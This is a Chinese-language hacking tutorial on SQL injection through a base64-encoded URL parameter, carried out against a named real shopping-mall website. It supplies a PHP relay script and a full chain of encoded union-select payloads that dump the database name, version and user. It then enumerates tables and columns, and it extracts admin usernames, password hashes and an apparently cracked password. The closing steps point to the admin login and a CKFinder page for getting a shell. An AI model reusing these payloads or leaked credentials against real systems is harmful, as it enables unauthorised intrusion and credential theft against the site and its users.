base64编码快速中转注入-仔细注意参数-不要单纯认为是字符

previous page next page

假设存在一个注入点:http://www.xxx.com/features_view.php?id=22

但是应用程序进行了base64加密,看到的url为:http://www.xxx.com/features_view.php?id=MjI=

如果用工具注入,或者手工注入,都很不方便,我们可以本地搭建一个php环境,来中转注入,php本身就有base64编码函数,代码如下:

  1. <?php
  3. $a = base64_encode ($_GET['id']);
  5. $url="http://www.xxx.com/features_view.php?id=$a";
  7. echo file_get_contents($url);
  9. ?>

http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTI    base64参数加密    MTI 就是12base64     使用tamper里的base64编码

试试能否注入:

  1. id=12
  2. id=MTIn       (报错)

 

  1. id=12    (不加一撇正常)

1.  判断字段

  1. id= 12 order by 9

对应base链接:

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgb3JkZXIgYnkgOQ==     (显示正常)

  1. id= 12 order by 10

对应链接:

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgb3JkZXIgYnkgMTA=    (错误)


2.判断显示位:

  1. id=12 and 1=2 union select 1,2,3,4,5,6,7,8,9

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDk=

  1. 显示位: 5,7

3、查找基本信息:

  1. 12 and 1=2 union select 1,2,3,4,5,6,concat(database(),0x2020,version(),0x2020,user()),8,9

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.phpid=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsY29uY2F0KGRhdGFiYXNlKCksMHgyMDIwLHZlcnNpb24oKSwweDIwMjAsdXNlcigpKSw4LDkK

  1. database:    hdm0570415_db
  3. user:   hdm0570415@223.4.80.80
  5. version:  5.1.48-log

4.爆表:

  1. id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9 from information_schema.columns where table_schema=0x68646D303537303431355F6462  

(备注:0x68646D303537303431355F6462hdm0570415_dbhex)

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKERJU1RJTkNUK3RhYmxlX25hbWUpLDgsOSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0weDY4NjQ2RDMwMzUzNzMwMzQzMTM1NUY2NDYy

表:

  1. act,act_cat,act_cat_en,activity,activity_copy,activity_en,activity_en_copy,admin,admin_en,brand,brand_20130320,brand_en,category,category_en,download,download_en,footer,footer_en,img_index,img_index_en,lb_cat,lb_cat_en,news,news_en,rotate,rotate_en,service,user,user_en,video,video_en,videosed,videosed_en,zl_downl,zl_downl_en,zt_downl,zt_downl_en

5、爆字段:

  1. id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(DISTINCT column_name),8,9 from information_schema.columns where table_name=0x61646D696E

(备注:0x61646D696Eadminhex值)

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKERJU1RJTkNUIGNvbHVtbl9uYW1lKSw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZENjk2RQo=

  1. 字段:admin_id,username,passwd,super_admin,lastLogin,session

6.爆内容:

  1. id=12 and 1=2 union select 1,2,3,4,5,6,GROUP_CONCAT(username,0x2020,passwd,0x2020,super_admin),8,9 from admin

  1. http://www.yintai-centre.com/beijing/CN/mall/activitys.php?id=aWQ9MTIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsR1JPVVBfQ09OQ0FUKHVzZXJuYW1lLDB4MjAyMCxwYXNzd2QsMHgyMDIwLHN1cGVyX2FkbWluKSw4LDkgZnJvbSBhZG1pbg==

得到:

  1. admin 95f66ac1d48930df6b281ea2fe24fc7d,
  2. ytadmin 80d799abe463fd94cd165a5982e123b8,      leguan2013
  3. 95f66ac1d48930df6b281ea2fe24fc7d

7、找后台:

  1. http://www.yintai-centre.com/beijing/CN/admin/login.php 

登陆:

 

8、拿shell

   

http://www.yintai-centre.com/beijing/CN/admin/ckfinder/ckfinder.html

 

previous page start next page